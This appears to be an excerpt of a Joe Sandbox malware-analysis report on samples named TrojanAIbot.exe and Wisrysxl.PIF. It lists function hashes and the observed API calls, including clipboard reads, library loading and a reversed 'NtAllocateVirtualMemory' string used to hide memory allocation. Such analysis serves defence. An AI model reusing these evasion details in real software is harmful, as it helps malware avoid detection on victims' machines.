Source File: 0000000F.00000002.1600429889.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_4eb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba4790bfe91e9cb285cef387e737ebabffa6664bd75bcab06959d993a787fb13
Instruction ID: a85e003e9f644bd6351d175656177bbdfb1b98688f7603664c34b24763033615
Opcode Fuzzy Hash: ba4790bfe91e9cb285cef387e737ebabffa6664bd75bcab06959d993a787fb13
Instruction Fuzzy Hash: 1BD01274448388DBDB266F74A4D49153F506B12251F0405EDDC560A293D9378849CF00

Function 04EB7EA0 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1600429889.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_4eb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bfb5a0f3720e911c82b15d1463827d1cb65230c47d980bfff44d99ad5e7ed37
Instruction ID: 0ba3246f91b98f66623dd102615588d1de252658ba3f3b5d0afb8ff9d6c3f304
Opcode Fuzzy Hash: 8bfb5a0f3720e911c82b15d1463827d1cb65230c47d980bfff44d99ad5e7ed37
Instruction Fuzzy Hash: D1C02B7150E1008FEF08A73148643337E321B83300F5280ECC28182C90CE304409DF01

Function 04EB7940 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1600429889.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_4eb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 010afa75846c8428741beb6a1a0a54650e68917689ea9fd9da77749ce982855b
Instruction ID: b507f52a6df8fbb5df52170f75df4b84ddfa02a374324d098afad4695f2364f0
Opcode Fuzzy Hash: 010afa75846c8428741beb6a1a0a54650e68917689ea9fd9da77749ce982855b
Instruction Fuzzy Hash: 77B09230048708CFC2486FB5A444815732DAB4121638004A8E81E0A3928E3BEC85CA54

Analysis Process: TrojanAIbot.exePID: 5212, Parent PID: 3160COMMON

Execution Graph

Execution Coverage:	9.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	303
Total number of Limit Nodes:	28

Executed Functions

Function 0313D418 Relevance: 1.7, APIs: 1, Instructions: 199
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000013.00000002.2688863520.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3130000_TrojanAIbot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36f8e77f74cb455e4d1c7401099872a1b72ce6fea362142e3ff2475a0ea95ed0
Instruction ID: e1c8a63e3b7ca86747f4825032e8c0479d5efb93c828423dd86ddda83b80da9c
Opcode Fuzzy Hash: 36f8e77f74cb455e4d1c7401099872a1b72ce6fea362142e3ff2475a0ea95ed0
Instruction Fuzzy Hash: 698147B0A00B458FDB24DF29E44479ABBF5FF89704F04896DD48ADBA50DB74E849CB90

Function 05E51C94 Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 05E56671

Memory Dump Source

Source File: 00000013.00000002.2699412730.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5e50000_TrojanAIbot.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: cb72426845f7c0bf21c8de2258ec40f6d999e64991d2510aaa2f49984a19f86a
Instruction ID: 09eac3610c7964b00fa61cc3cd4cfff140c1edd142ed8299f5655ce99489d540
Opcode Fuzzy Hash: cb72426845f7c0bf21c8de2258ec40f6d999e64991d2510aaa2f49984a19f86a
Instruction Fuzzy Hash: 2941FAB4900305DFDB14CF95C488AAABBF6FB88314F148459D959AB321D775A845CFA0

Function 05E5F898 Relevance: 1.6, APIs: 1, Instructions: 87
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 05E5F967

Memory Dump Source

Source File: 00000013.00000002.2699412730.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5e50000_TrojanAIbot.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 449357f2442471d4f48f74525dd6f0b75777fa1adc6708c59292453eb8832ebb
Instruction ID: 5cc694962af6a63d93831888037e76b59a589bf12cdcb7fbe9a6b00805bc3347
Opcode Fuzzy Hash: 449357f2442471d4f48f74525dd6f0b75777fa1adc6708c59292453eb8832ebb
Instruction Fuzzy Hash: BA31B271905389DFDB12CFA9C804ADEBFF5AF49310F14809BE994AB251C3359854DFA1

Function 0677483C Relevance: 1.6, APIs: 1, Instructions: 76
comclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleGetClipboard.OLE32(?), ref: 067748D0

Memory Dump Source

Source File: 00000013.00000002.2700817875.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6770000_TrojanAIbot.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: 9b153bf162163adeb7ea1dabfd5c6165524f5e64bfd99311a12c38e97e16443c
Instruction ID: 55d666fff5d23508f07fc2f40c51d085e343d455b3d4830a8e79a613c675ebe7
Opcode Fuzzy Hash: 9b153bf162163adeb7ea1dabfd5c6165524f5e64bfd99311a12c38e97e16443c
Instruction Fuzzy Hash: 4831F0B0D01248DFDB54CF99C984B9EBBF5AF48714F208059E044AB294D7B89945CF65

Function 06774848 Relevance: 1.6, APIs: 1, Instructions: 71
comclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleGetClipboard.OLE32(?), ref: 067748D0

Memory Dump Source

Source File: 00000013.00000002.2700817875.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6770000_TrojanAIbot.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: f227194b932b83b2522744a8b9b4fb64420bf451464ddf3b5f9251307db9a47e
Instruction ID: 1b4b85b9ee3e1889855e5d593044617f64d077e49b6cdb5a4fa8b2c1d4a7ad9d
Opcode Fuzzy Hash: f227194b932b83b2522744a8b9b4fb64420bf451464ddf3b5f9251307db9a47e
Instruction Fuzzy Hash: 7731EEB0D01348DFDB64CF99C984B9EBBF5AF48714F208059E408AB294DBB4A945CFA5

Function 0313E1A0 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0313FCD6,?,?,?,?,?), ref: 0313FD97

Memory Dump Source

Source File: 00000013.00000002.2688863520.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3130000_TrojanAIbot.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 6e818f2838b22877fe7ad1171a522b7627aaaeb0548de43c64d76ca047927767
Instruction ID: 88a522ef0ef1309514a692a1c8d1c571652f93d9a5d1de26b3fc61b8a07e211f
Opcode Fuzzy Hash: 6e818f2838b22877fe7ad1171a522b7627aaaeb0548de43c64d76ca047927767
Instruction Fuzzy Hash: 9321E5B5D002499FDB10CFAAD884AEEFBF8EB48310F14841AE914A7351D374A955CFA5

Function 0313FD09 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0313FCD6,?,?,?,?,?), ref: 0313FD97

Memory Dump Source

Source File: 00000013.00000002.2688863520.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3130000_TrojanAIbot.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 08690ccc1b3d826512d097bbf93a8bc1320ade19dedeeb98bf2fcec63f0b33e2
Instruction ID: e122b5650ff65a07f3bb200c3a922ac9b3edd4fdbe5bf994eb04fc4ebfe5d46b
Opcode Fuzzy Hash: 08690ccc1b3d826512d097bbf93a8bc1320ade19dedeeb98bf2fcec63f0b33e2
Instruction Fuzzy Hash: 6221FFB5C00248AFDB10CFAAD984AEEBBF4AB48210F14841AE958A3250C378A940CF65

Function 05E5D520 Relevance: 1.6, APIs: 1, Instructions: 56
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowTextW.USER32(?,00000000), ref: 05E5D592

Memory Dump Source

Source File: 00000013.00000002.2699412730.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5e50000_TrojanAIbot.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: 22cadf0c9ef1d6fb119022e241ce0424fd81bd1e9b1f737642fcbd57ec458ca4
Instruction ID: 81db911fdfcd105337b12fe38669b4b94c3277c48e0957b4d41dedf8aeff8050
Opcode Fuzzy Hash: 22cadf0c9ef1d6fb119022e241ce0424fd81bd1e9b1f737642fcbd57ec458ca4
Instruction Fuzzy Hash: 1D2106B6900249CFDB14CF9AC944BDEFBF4AF88324F14842AD899A7650D378A645CF61

Function 05E5D528 Relevance: 1.6, APIs: 1, Instructions: 53
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowTextW.USER32(?,00000000), ref: 05E5D592

Memory Dump Source

Source File: 00000013.00000002.2699412730.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5e50000_TrojanAIbot.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: c8360e0cd372f560e2393b1202478b1111028db578995e6d18f3b7eb69cea58a
Instruction ID: e3fe37d5ab7390ad389b885514fceed63a26b0b2671bde92b8d9c8d58972295a
Opcode Fuzzy Hash: c8360e0cd372f560e2393b1202478b1111028db578995e6d18f3b7eb69cea58a
Instruction Fuzzy Hash: 011117B1C002498FDB14CF9AC844BDEFBF4EF48324F10841AD859A3250D374A645CFA1

Function 05E5F8F8 Relevance: 1.6, APIs: 1, Instructions: 53
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 05E5F967

Memory Dump Source

Source File: 00000013.00000002.2699412730.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5e50000_TrojanAIbot.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: c7048f1b6637b1e4365c3ab069b0504520e423af6f3c8692f633e8fe35420fc2
Instruction ID: 921e7988430858d383c710183f37443e0116a66fafea038c62202a3dcdc03d4f
Opcode Fuzzy Hash: c7048f1b6637b1e4365c3ab069b0504520e423af6f3c8692f633e8fe35420fc2
Instruction Fuzzy Hash: 211134B28003499FDB10CFAAD844BDEBFF8EB48320F14841AE954A7250C375A950DFA5

Function 05E5FC68 Relevance: 1.5, APIs: 1, Instructions: 48
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SendMessageW.USER32(?,?,?,?,?,?,?,?,00000000,?,?), ref: 05E5FCCD

Memory Dump Source

Source File: 00000013.00000002.2699412730.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5e50000_TrojanAIbot.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 8b3f29d97fd1a8daf28191d9d7ba524fa98c8874eb01ca207c81beeec222eaea
Instruction ID: b55759e47ab27e4c038e5cd444aebf0561cedc97ac8ce1ac4e57386e47d434ed
Opcode Fuzzy Hash: 8b3f29d97fd1a8daf28191d9d7ba524fa98c8874eb01ca207c81beeec222eaea
Instruction Fuzzy Hash: C41125B58002488FDB10CF9AD845BEEBBF4EB48320F10881AD969A7200C378A544CFA5

Function 0313D618 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0313D67E

Memory Dump Source

Source File: 00000013.00000002.2688863520.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_3130000_TrojanAIbot.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 2a29909370a508dd33a3550f508a2a28eac8f2868b332cb71c35ba1457472ab1
Instruction ID: a2daf70d6892b2511022d1a8482ccbbe4a0874453a67f3800ffe971ad4159518
Opcode Fuzzy Hash: 2a29909370a508dd33a3550f508a2a28eac8f2868b332cb71c35ba1457472ab1
Instruction Fuzzy Hash: 491110B5C007498FCB10DF9AD844BDEFBF4EF88224F14842AD829A7210C379A545CFA5

Function 05E5E460 Relevance: 1.5, APIs: 1, Instructions: 47
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SendMessageW.USER32(?,?,?,?,?,?,?,?,00000000,?,?), ref: 05E5FCCD

Memory Dump Source

Source File: 00000013.00000002.2699412730.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5e50000_TrojanAIbot.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 5fae0f0a258ed55784abb97a9864796f963a54d1f1f51a278c605e9acc7c081c
Instruction ID: 499771a59a2482c69cf9018e4130b5c459a628e77f9da75a22d9b931b70d2166
Opcode Fuzzy Hash: 5fae0f0a258ed55784abb97a9864796f963a54d1f1f51a278c605e9acc7c081c
Instruction Fuzzy Hash: 1511F2B58043489FDB10DF9AD885BDEBBF8EB48324F10841AE969A7200D375A944CFA5

Function 0677225C Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,06773687), ref: 06774125

Memory Dump Source

Source File: 00000013.00000002.2700817875.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6770000_TrojanAIbot.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 2eaee824a55e3dd2ccdb616b737b3b67fda661d2ef6db0040f2ddb717b30cea5
Instruction ID: 69b46c198a68c1a5c3787c2dc3e5eb212bf2df55fd996b6e449e003449572d52
Opcode Fuzzy Hash: 2eaee824a55e3dd2ccdb616b737b3b67fda661d2ef6db0040f2ddb717b30cea5
Instruction Fuzzy Hash: 7C11EDB5D04658CFCB20DF9AD844BDEFBF4EB48214F10846AE829A3250D378A544CFA5

Function 06773140 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 0677319D

Memory Dump Source

Source File: 00000013.00000002.2700817875.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6770000_TrojanAIbot.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: d51ff3ad896987e1a5d8ace9ea54d03f2d4bb840a20be771859a57af66559ce3
Instruction ID: f01920daf1a4a1944fdaaa58b9395d3cd44782685879d8f2cf76f75834ba5ad1
Opcode Fuzzy Hash: d51ff3ad896987e1a5d8ace9ea54d03f2d4bb840a20be771859a57af66559ce3
Instruction Fuzzy Hash: 031115B5C007488FDB50CFAAD944BDEFBF4AB48720F14881AD419A7640C379A944CFA5

Function 067721B0 Relevance: 1.5, APIs: 1, Instructions: 46
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleInitialize.OLE32(00000000), ref: 0677319D

Memory Dump Source

Source File: 00000013.00000002.2700817875.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6770000_TrojanAIbot.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 85071b281b54dc7dcc1e7fac8d7b562f2595769b94c154c5fe145bd87efc03f6
Instruction ID: 0355342d04987e22a3f1a5e12fcc64b68a51d21f7eaca09d643718b5de047686
Opcode Fuzzy Hash: 85071b281b54dc7dcc1e7fac8d7b562f2595769b94c154c5fe145bd87efc03f6
Instruction Fuzzy Hash: CD1115B59007488FDB20DF9AD848BDEFBF8EB48220F10841AD519A7640D375A944CFA5

Function 067740C1 Relevance: 1.5, APIs: 1, Instructions: 42windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,06773687), ref: 06774125

Memory Dump Source

Source File: 00000013.00000002.2700817875.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6770000_TrojanAIbot.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: c73a7c39ff611f00902fb3b1f35954a700fdf074ef5f12f46998acabee4ca9e1
Instruction ID: b21331ed93aa2975ce496c93b6e570c510f634b0cf3cca92d7289562f01ea489
Opcode Fuzzy Hash: c73a7c39ff611f00902fb3b1f35954a700fdf074ef5f12f46998acabee4ca9e1
Instruction Fuzzy Hash: 8C1112B5D00648CFCB10CFAAE844BDEFBF4EB48314F10842AD828A7650C378A544CFA5

Function 0178D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2687566740.000000000178D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0178D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_178d000_TrojanAIbot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fd738986432958d2e8a8d3f7d6b8883149fb5ed7bc1c855f28d56e6af01dadb
Instruction ID: 14a44af7ec19cc185f915502f54d63eb51738de70c7676d09bf514a27022dccf
Opcode Fuzzy Hash: 1fd738986432958d2e8a8d3f7d6b8883149fb5ed7bc1c855f28d56e6af01dadb
Instruction Fuzzy Hash: 8D210771644344EFDB25EF94D9C4B16FBA5FB84314F20C5ADE8494B286C336D447CA62

Function 0178D017 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2687566740.000000000178D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0178D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_178d000_TrojanAIbot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb11cfc8073ccb158cd0f42583cdb3ded50e3effa001a3c93aefd0de24dc37f6
Instruction ID: 8cbbaa6683436ab175fd9529c9b102e2299369ab7be50fa667aec7725dfcf967
Opcode Fuzzy Hash: fb11cfc8073ccb158cd0f42583cdb3ded50e3effa001a3c93aefd0de24dc37f6
Instruction Fuzzy Hash: 9E110075548280CFCB12DF54D5C4B15FFA1FB44314F24C6A9D8094B696C33AD40BCB61

Function 0177D07D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2687261774.000000000177D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0177D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_177d000_TrojanAIbot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a4cc3c244d57ae2f9b23d1452887a9a497e815d9a40c15c3e679d69fa895e2e
Instruction ID: 8a5998728bb2d6934f4b8f17312fd0986e437480ab1aef4ee540ee79c0eb7f6e
Opcode Fuzzy Hash: 2a4cc3c244d57ae2f9b23d1452887a9a497e815d9a40c15c3e679d69fa895e2e
Instruction Fuzzy Hash: 6901A771404344ABEB315A65C8847A7FFD8EF85664F18D45AED090B283C3759445CA71

Function 0177D07C Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2687261774.000000000177D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0177D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_177d000_TrojanAIbot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40f2a8e62c2e03d5687e2c778159a5358da34b304f663eb36fd9425701080f3e
Instruction ID: ede40b0fcf74399833c1f86237300b9dc70728a1bbc352242ae51d6f45422f4e
Opcode Fuzzy Hash: 40f2a8e62c2e03d5687e2c778159a5358da34b304f663eb36fd9425701080f3e
Instruction Fuzzy Hash: AFF09071408344AFEB219E1ACC84B63FFE8EF85674F18C45AED585B297C3799844CAB1

Analysis Process: TrojanAIbot.exePID: 5352, Parent PID: 660COMMON

Executed Functions

Function 012A0839 Relevance: .6, Instructions: 603COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.1607457701.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_12a0000_TrojanAIbot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c22da23a17f2617d2863d21e0dbb8cf9ca47f946cc0691d646cb743493148607
Instruction ID: 926797dcfeb9661ed4415ca7b19d65cf53908b85a3fb33026f10b39be8994db1
Opcode Fuzzy Hash: c22da23a17f2617d2863d21e0dbb8cf9ca47f946cc0691d646cb743493148607
Instruction Fuzzy Hash: C562AE70A01269CFDB64DF64D894B9EBBB2FB49304F1080E9D44AAB355EB365E81CF44

Function 012A0848 Relevance: .6, Instructions: 601COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.1607457701.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_12a0000_TrojanAIbot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4f6ae035e32b1515c34b6357e60407610ea4da4d2f6d8e6021c0c4567c0c9c7
Instruction ID: 70916812050104932f7207dab089af384f6bd03b30032acc198a8d850b56d97f
Opcode Fuzzy Hash: f4f6ae035e32b1515c34b6357e60407610ea4da4d2f6d8e6021c0c4567c0c9c7
Instruction Fuzzy Hash: D462AE70A01269CFDB64DF64D894B9EBBB2FB49304F1080E9D44AAB355EB365E81CF44

Function 012A5228 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.1607457701.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_12a0000_TrojanAIbot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52089d1514e84d87513234f8f9de4bd762baa2d9dbb737b121757e1cd7bb88fd
Instruction ID: 1bd3b0295a27ea464e3d475b07e7c32ae0f3052ef3ea10489db08b6e2b29b6ab
Opcode Fuzzy Hash: 52089d1514e84d87513234f8f9de4bd762baa2d9dbb737b121757e1cd7bb88fd
Instruction Fuzzy Hash: 1C116970C15349DFEB04AFB8D4293FEBFB0EB06301F4458AAD555A3280EB784688CB51

Function 012A5238 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.1607457701.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_12a0000_TrojanAIbot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 097904fe5a9fcd4802c101a48462ca563fc1156f2e4ef669da105151805b76ba
Instruction ID: b552be45ff1ac7501fe8b04c7c8f39bf5c0533bfeb0555b2d31f77570b7cd97a
Opcode Fuzzy Hash: 097904fe5a9fcd4802c101a48462ca563fc1156f2e4ef669da105151805b76ba
Instruction Fuzzy Hash: 68015A70C51319DFDB04EFB8C4193AEBFF0EB06301F4098AA9515A3280EB784688CF51

Analysis Process: Wisrysxl.PIFPID: 7456, Parent PID: 4084COMMON

Execution Graph

Execution Coverage:	8.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	168
Total number of Limit Nodes:	12

Executed Functions

Function 02A95ACC Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 184
registrystringlibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 02A95AE8
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02A95B06
RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02A95B24
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02A95B42
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,02A95BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02A95B8B
RegQueryValueExA.ADVAPI32(?,02A95D38,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,02A95BD1,?,80000001), ref: 02A95BA9
RegCloseKey.ADVAPI32(?,02A95BD8,00000000,00000000,00000005,00000000,02A95BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02A95BCB
lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02A95BE8
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105), ref: 02A95BF5
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105), ref: 02A95BFB
lstrlen.KERNEL32(00000000), ref: 02A95C26
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 02A95C6D
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02A95C7D
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 02A95CA5
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02A95CB5
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02A95CDB
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02A95CEB

Strings

., xrefs: 02A95C38
Software\Borland\Delphi\Locales, xrefs: 02A95B38
Software\Borland\Locales, xrefs: 02A95AFC, 02A95B1A

Memory Dump Source

Source File: 0000001A.00000002.1659943821.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A91000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2a91000_Wisrysxl.jbxd

Similarity

API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
String ID: .$Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1759228003-3917250287
Opcode ID: 7f31b219eeafb70db9325782edbe4442eb947da5a546844091410a60c69538a8
Instruction ID: 91f8effe37962583a818632f2214ea46107db35cf0f45570bfddc18ea6a8d784
Opcode Fuzzy Hash: 7f31b219eeafb70db9325782edbe4442eb947da5a546844091410a60c69538a8
Instruction Fuzzy Hash: 8F517071E4025D7AFF26D6A58D86FEFB7ED9B04744F8001A1AA04E6181EE749A44CFA0

Function 02AA7A2A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02AA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02AA821E

Part of subcall function 02AA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02AA82C7
Part of subcall function 02AA8274: GetProcAddress.KERNEL32(?,?), ref: 02AA82D9

NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02AA7A9F

Strings

yromeMlautriVetacollAwZ, xrefs: 02AA7A47
ntdll, xrefs: 02AA7A74

